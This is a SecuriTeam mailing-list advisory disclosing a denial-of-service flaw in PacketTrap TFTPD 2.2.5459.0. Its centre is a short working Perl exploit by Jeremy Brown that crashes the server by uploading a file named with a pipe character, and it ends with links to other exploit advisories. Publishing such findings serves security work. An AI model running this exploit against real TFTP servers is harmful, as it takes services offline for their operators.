[EXPL] PacketTrap TFTPD DoS

- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.

- - - - - - - - -

PacketTrap TFTPD DoS

SUMMARY

A vulnerability in PacketTrap's TFTPD allows remote attackers to cause the
TFTP server to fail by sending it a pipe (|) character as the filename
that is being uploaded.

DETAILS

Vulnerable Systems:
* PacketTrap TFTPD version 2.2.5459.0

Exploit:
#!/usr/bin/perl
# Jeremy Brown [0xjbrown41@xxxxxxxxx/jbrownsec.blogspot.com]
# PacketTrap TFTPD DoS (latest 2.2.5459.0 tested) -- www.packettrap.com
# Must have Net::TFTP installed (easy to install, 'cpan' then 'install
Net::TFTP' ;)
# A product of tftpfuzz.pl (coming soon)

use Net::TFTP;
use Getopt::Std;

$tftp = Net::TFTP->new("192.168.0.112");
$tftp->ascii;
$tftp->put("test", "|");

exit;

ADDITIONAL INFORMATION

The information has been provided by <mailto:0xjbrown41@xxxxxxxxx> Jeremy
Brown.

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages

  • [EXPL] phpBB Remote PHP Code Execution (viewtopic.php 2)
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... The following exploit code utilizes a vulnerability in phpBB to cause ... This bulletin is sent to members of the SecuriTeam mailing list. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)
  • [EXPL] TinyWeb Server DoS Exploit
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)
  • [EXPL] 3Com FTP Server Buffer Overflow (CD)
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... overflow in its parsing of the 'CD' command. ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)
  • [TOOL] Automagic SQL Injector
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... The Automagic SQL Injector is part of the Sec-1 Exploit Arsenal provided ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)
  • [NT] Cain & Abel PSK Sniffer Heap overflow
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... of passwords by sniffing the network, ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)